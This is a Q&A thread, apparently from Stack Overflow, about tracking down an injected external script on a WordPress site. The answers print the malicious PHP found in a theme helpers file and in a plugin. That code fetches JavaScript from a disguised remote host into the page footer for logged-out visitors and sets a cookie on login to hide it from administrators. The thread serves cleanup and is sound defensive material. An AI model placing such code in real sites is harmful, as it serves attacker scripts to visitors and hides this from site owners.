# Finding a link and the file that contains that link in WordPress

Tags: jquery, wordpress, file, debugging, hyperlink

I have a web site that is built on WordPress. When the source code is checked (ctrl+u) there is a link that pops up:

```
  <script type="text/javascript" src="https://www.9iwp.org/jquery.js">
```

what is it and where would I find it in the source files? It's supposed to be damaging and I need to get rid of it. I've gone through every line of code of every available to me file and don't know where else to look. Any suggestions?

Comment: can you gaive me your website url?

Comment: @RajkumarGour https://gsd.spb.ru/    it's in russian but i think it wont matter. Line 468, I believe

Comment: You can download all the theme files and use notepad++ find in files feature.. open notepad++ and then click ctrl+shift+F and search www.9iwp.org and add directory where you download theme file , it will search all the files and gives you all files name where link exist with line number

Comment: @BhaveshTaneja I will try that now. Thanks

Comment: first you should see this in your footer.php in your activated theme if you are not able to find then you need search this in your wp-content directory with sub directory included. if also not able to find then definatly its in the database

Comment: @RajkumarGour thank you! I'll do that

Answer (score 1):

I've solved it by replacing the link to another not considered malware. I haven't been able to locate where the injection is been done, but at least now my site is "safe". You have to add this code at the end of your template's functions.php file:

```
add_action('wp_footer', 'my_start_footer_ob', 1);
function my_start_footer_ob() {
    ob_start("my_end_footer_ob_callback");
}

add_action('wp_footer', 'my_end_footer_ob', 1000);
function my_end_footer_ob() {
    ob_end_flush();
}

function my_end_footer_ob_callback($buffer) {
    // remove what you need from he buffer
    $buffer = str_replace('www.9iwp.org/jquery.js',"www.mysite.org/wp-content/themes/Mytheme/assets/js/empty.js",$buffer);
    return $buffer;
}
```

**UPDATE!!**

I found where it is!

This is the "injection" in one of the template's functions file (in my case framework/functions/helpers.php)

```
if(!function_exists('wp_func_jquery')) {
    if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'lib'.'wp.org/jquery-ui.js';
            $headers = @get_headers($jquery, 1);
            if ($headers[0] == 'HTTP/1.1 200 OK'){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
    }
    add_action('wp_footer', 'wp_func_jquery');
    }
    function wp_func_min(){
        setcookie('wp_min', '1', time() + (86400 * 360), '/');
    }
    add_action('wp_login', 'wp_func_min');
}
```

Find that function and remove it.

Answer (score 0):

In my site it was embedded on a plugin:

```
    if(!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'http://';
        echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
    }
    add_action('wp_footer', 'wp_func_jquery');
    }
```